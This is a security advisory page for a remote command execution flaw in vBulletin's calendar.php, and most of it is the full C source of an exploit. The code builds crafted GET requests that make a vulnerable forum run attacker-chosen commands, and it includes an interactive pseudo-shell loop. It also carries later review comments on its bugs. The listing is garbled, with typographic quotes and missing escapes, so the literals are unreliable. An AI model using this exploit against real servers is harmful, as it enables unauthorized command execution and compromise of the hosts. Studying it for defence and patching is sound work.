vBulletin Calendar Command Execution Vulnerability (Exploit)

Summary

A security vulnerability in vBulletin's Calendar PHP script allows remote attackers to make the product execute arbitrary code, usually as the user 'nobody'. This would allow a remote attacker to compromise parts of the operating system, and possibly the complete operating system, by exploiting other vulnerabilities that are exposed to local users.

Credit:

The information has been provided by gosper.


Details

Vulnerable systems:
 * vBulletin version 2.0.3 and prior

Immune systems:
 * vBulletin versions 2.2.0 and later

Solution:
Upgrade to the latest version of the product.

Exploit:
/* php2.c – vBulletin/calendar.php remote command execution exploit
 *
 * This code is published property of gosper
 * leads to gid apache.
 *
 * thanks and shouts go out to ectos and tgrey 😉
 *
 * (C) COPYRIGHT Gosper , 2002 – gosper@nix.org
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

/* Compile-time configuration and forward declarations.
 *
 * NOTE(review): throughout this listing the C string/character literals are
 * shown with typographic quotes and the backslash of "\n" escapes dropped
 * ("...n’"); presumably an extraction artifact of the page rather than the
 * original source — confirm before reading any literal as exact.
 */
#define PORT 80   // target port is fixed; no command-line option overrides it
#define MAX 200   // size of every request buffer in this file (buf, temp, final)
/* Fixed request-path fragments placed before and after the user-supplied
 * command text when the GET line is assembled in main() and interactive(). */
#define evil1 ‘/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60’
#define evil2 ‘%20%60;die();echo%22’
 
char exploit(char *host, char *string);   // NOTE(review): declared to return char, but the definition never returns a value
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);

/*
 * Entry point. argv[1] is taken as the target host; the remaining arguments
 * are parsed with getopt(): -c <command> sets the command text for the
 * single request built below, -i <path> enters interactive() (which never
 * returns), -d prints `buf` and then falls through into usage(). The
 * optstring also lists 'p', but no case handles it, so -p reaches default.
 *
 * NOTE(review): getopt() is called without <unistd.h> being included, so it
 * is implicitly declared (only `optarg` is declared, locally, as extern).
 * `command` is never initialized and is passed to sprintf() when -c is
 * absent. `buf` is MAX (200) bytes and the sprintf() is unbounded, so a long
 * -c value overruns it. Returns 0 after the request, or exits via usage().
 */
int main(int argc, char *argv[])
{
  char buf[MAX], *command, *path, *host;
  int res;
  extern char *optarg;

    if(argc > 1) {
      host = argv[1]; // make things easier
         while((res = getopt(argc, argv, ‘i:c:p:d’)) != EOF) { // 'p' accepted but unhandled; EOF compared where getopt returns -1
           switch(res){

            case ‘c’: command = optarg;
                  break;
      
            case ‘i’: path = optarg;
             //sprintf(buf, ‘GET %s%s%s%sn’ , path , evil1, command, evil2);
           interactive(host, path); // loops forever; the request below is never built on this route
           //exit(0);
                 break;
      
                  case ‘d’: printf(‘%s’ , buf); // NOTE(review): buf is still uninitialized here, and there is no break: falls through into usage()

            default: usage(argv[0]); // usage() calls exit(1), so the break is never reached
                        break;
                 }

                    }
  
      sprintf(buf, ‘GET %s%s%sn’ , evil1, command, evil2); // NOTE(review): unbounded write into buf[MAX]; command may be uninitialized
      exploit(host, buf);
  }
else
   usage(argv[0]);
return 0;

}

/*
 * Resolves `host`, opens a TCP connection to port PORT, sends `string` and
 * prints whatever the first recv() delivers. Every failure path prints a
 * message and exit(-1)s the whole process.
 *
 * NOTE(review): declared to return char but falls off the end without a
 * return value (UB if a caller used the result; both call sites discard
 * it). `buf` and `data` are unused. send() is passed sizeof(buf2) == 999 as
 * the length although every caller hands in a MAX (200)-byte array, so it
 * reads past the caller's buffer. The recv() return value is ignored and
 * `output` is never NUL-terminated before being printed with "%s".
 * close() is used without <unistd.h>; bzero() without <strings.h>.
 */
char exploit(char *host, char *string){
 int fd, data; // data is never used
 char buf[MAX], buf2[999], output[5000]; // buf unused; buf2 only supplies the constant 999 to send()

 struct hostent *he;
 struct sockaddr_in server;
 
   if((he =gethostbyname(host))==NULL) {
  printf(‘Error unknown host 🙁 n’);
    exit(-1);
  }

   if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
  printf(‘Couldnt open socketn’);
      exit(-1);
   }

server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr); // first resolved address only
bzero(&(server.sin_zero),8);

 if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
  printf(‘Couldnt connect to hostn’);
  exit(-1);
  }

  
  send(fd, string, sizeof(buf2), 0); // NOTE(review): 999 bytes sent regardless of strlen(string) or the caller's buffer size
  recv(fd, output, sizeof(output), 0); // NOTE(review): single read, byte count discarded, no NUL terminator added
  printf(‘%s’ , output);

  close(fd);
 }

/*
 * Prompt loop: prints "php# ", reads one line from stdin, rewrites spaces as
 * "%20" via search_replace(), builds the GET line from `path`, evil1, the
 * line (minus its last character, presumably the newline) and evil2, and
 * hands it to exploit(). Never returns.
 *
 * NOTE(review): there is no exit condition, and the fgets() return value is
 * unchecked, so on EOF the loop keeps re-sending whatever `shell` holds.
 * `input` is malloc'd with strlen(shell) bytes, strlen(shell)-1 bytes are
 * copied and no NUL is written, so the "%s" in sprintf() reads past the copy
 * into uninitialized heap; the allocation is also never freed (leaks per
 * iteration). search_replace() grows the line in place inside the 100-byte
 * `shell` array with no bound, and `temp` is MAX (200) bytes for an
 * unbounded sprintf().
 */
void interactive(char *host, char *path) {
  char shell[100], temp[MAX], *input;

  printf(‘n (C) Gosper 2002n’);
  printf(‘ vbull, calendar.php exploitn’);
  
        while(1){
  printf(‘php# ‘);
  fgets(shell, sizeof(shell), stdin); // return value unchecked
  search_replace(shell, ‘ ‘, ‘%20’); // each space becomes three bytes; shell has no room to grow
  input = malloc(strlen(shell)*sizeof(char)); // NOTE(review): no space for a terminator, result unchecked, never freed
  memcpy(input, shell, strlen(shell)-1); // drops the trailing character (presumably '\n'); no NUL written
  sprintf(temp, ‘GET %s%s%s%sn’ , path , evil1, input, evil2); // NOTE(review): unbounded write into temp[MAX]
  exploit(host, temp);
  }
  }

/*
 * Replaces every occurrence of `find` in `string` with `replace`, in place.
 * Each pass rebuilds the whole string in `final` (prefix up to the match,
 * then `replace`, then the tail copied one character at a time through the
 * two-byte `temp` array) and writes it back over `string`. It assumes
 * `replace` does not itself contain `find`; otherwise strstr() always
 * matches and the loop never ends.
 *
 * NOTE(review): the literals on the `final[0] =`, `temp[1] =` and loop
 * condition lines appear as empty quotes in this listing — presumably '\0'
 * in the original (extraction artifact), confirm. `final` is MAX (200)
 * bytes and the capacity of `string` is unknown here; none of the
 * strncat/strcat/sprintf writes is bounded. The write-back passes `final`
 * as the format argument of sprintf(), so any '%' in the data (including
 * the "%20" the caller inserts) is parsed as a conversion specification.
 */
void search_replace(char *string, const char *find, const char *replace)
   {

           char final[MAX], temp[2];
           size_t start, end, i;
           while (strstr(string, find) != NULL) {
                   final[0] = ‘’; // reset the scratch buffer to an empty string (literal presumably '\0')
                   start = strstr(string, find) – string; // offset of the match; strstr() evaluated a second time
                   end = start + strlen(find);
                   temp[1] = ‘’; // temp is used as a one-character string for strcat()
                   strncat(final, string, start); // prefix before the match
                   strcat(final, replace);
                   for (i = end; string[i] != ‘’; i++) { // tail after the match, one char per strcat
                           temp[0] = string[i];
                           strcat(final, temp);
                   }
                   sprintf(string, final); // NOTE(review): data used as the format string; unbounded
           }
           return;
   }

/*
 * Prints the banner and the usage line to stdout and terminates the process
 * with exit status 1. Reached from main() when no host argument is given,
 * for any unhandled option, and by fall-through from -d.
 */
void usage(char *progname) {
 printf(‘____________________________________n’);
 printf(‘ calendar.php vbulletin exploitn’);
 printf(‘ (C) COPYRIGHT Gosper 2002n’);
 printf(‘ gosper@nix.orgnn’);
 printf(‘ Usage: %s host -i path to calendar.phpn’ , progname);
 printf(‘ Ex: %s 127.0.0.1 -i /bbsn’ , progname);
 exit(1); // never returns to the caller
 }’
